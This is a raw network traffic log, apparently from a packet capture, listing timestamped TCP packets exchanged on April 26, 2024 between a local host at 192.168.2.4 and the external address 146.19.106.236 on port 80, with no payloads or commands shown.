Apr 26, 2024 23:16:31.354840040 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.354865074 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.354866982 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.355093956 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355134010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355173111 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355174065 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.355212927 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355214119 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.355252028 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355292082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355330944 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355335951 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.355370998 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.355385065 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.408037901 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.408235073 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.408302069 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.408344984 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.408401012 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.511770964 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.511842966 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.511883974 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.511924982 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.511934042 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.511966944 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.511980057 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512007952 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512052059 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512054920 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512094975 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512161016 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512200117 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512209892 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512242079 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512247086 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512283087 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512321949 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512366056 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512367964 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512409925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512414932 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512447119 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512485027 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512494087 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512525082 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512562990 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512582064 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512602091 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512640953 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512656927 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512684107 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512725115 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512763977 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512770891 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512801886 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512809992 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512840986 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512881041 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512893915 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.512919903 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.512962103 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513001919 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513012886 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513042927 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513046980 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513079882 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513118982 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513127089 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513159037 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513197899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513237000 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513242960 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513276100 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513283968 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513315916 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513355017 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513394117 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513401031 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513433933 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513468981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513474941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513514042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513524055 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513552904 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513592005 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513634920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513652086 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513675928 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513680935 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513714075 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513751984 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513792038 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513798952 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513830900 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513835907 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513870955 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513911009 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513916016 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.513950109 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.513989925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514029980 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514044046 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514067888 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514072895 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514106989 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514146090 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514185905 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514193058 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514225006 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514231920 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514264107 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514306068 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514311075 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514343023 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514381886 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514420986 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514437914 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514460087 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514499903 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514509916 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514539003 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514549971 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514580011 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514620066 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514658928 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514677048 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514697075 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514703035 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514736891 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514775038 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514782906 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514813900 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514853001 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514893055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514923096 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514930964 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.514945984 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.514971018 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515008926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515016079 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515048981 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515089989 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515100002 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515129089 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515166998 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515206099 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515213013 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515244961 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515250921 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515285969 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515326023 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515364885 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515377045 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515403032 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515414000 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515443087 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515481949 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515521049 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515531063 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515558958 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515568972 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515597105 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515636921 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515676022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515691042 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515714884 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515719891 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515754938 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515793085 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515815020 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515831947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515870094 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515908957 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515917063 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515949011 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.515959978 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.515989065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516030073 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516056061 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516071081 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516124010 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516134024 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516175032 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516211987 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516232967 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516249895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516288042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516314983 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516325951 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516365051 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516371965 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516407967 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516448021 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516479969 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516486883 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516526937 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516530037 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516565084 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516602993 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516640902 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516642094 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516679049 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516690016 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516720057 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516760111 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516782999 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516799927 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516839027 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516896009 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516902924 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516937017 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.516942024 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.516977072 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517019987 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517060041 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517071009 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517101049 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517112017 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517141104 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517179012 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517218113 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517225981 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517258883 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517260075 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517301083 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517677069 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517765999 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517805099 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517849922 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517858982 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517888069 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517925978 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.517925978 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.517965078 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518024921 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518038034 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518079042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518134117 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518151999 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518258095 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518299103 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518316984 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518435955 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518484116 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518578053 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518620968 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518661022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518666983 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518701077 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518739939 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518779993 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518788099 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518832922 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.518938065 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.518976927 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519092083 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519119024 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519130945 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519172907 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519212961 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519223928 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519247055 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519262075 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519265890 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519299984 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519335985 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519344091 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519357920 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519380093 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519448042 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519474030 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519500971 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519537926 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519556999 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519575119 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519635916 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519654036 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519674063 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519678116 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519692898 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519715071 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519774914 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519794941 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519814014 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519833088 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519839048 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519855022 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519862890 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519876003 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519897938 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.519953966 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519972086 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519990921 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.519994020 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520009995 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520028114 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520036936 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520047903 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520066977 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520091057 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520117044 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520139933 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520159006 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520176888 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520198107 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520257950 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520322084 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520340919 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.520345926 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520407915 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.520925045 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521358013 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521549940 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521550894 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.521694899 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521744967 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.521832943 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521950960 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521972895 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.521997929 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.522020102 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522089958 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.522100925 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522267103 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522315979 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.522444010 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522464991 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522484064 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522510052 CEST	49732	80	192.168.2.4	146.19.106.236
Apr 26, 2024 23:16:31.522537947 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522573948 CEST	80	49732	146.19.106.236	192.168.2.4
Apr 26, 2024 23:16:31.522579908 CEST	49732	80	192.168.2.4	146.19.106.236
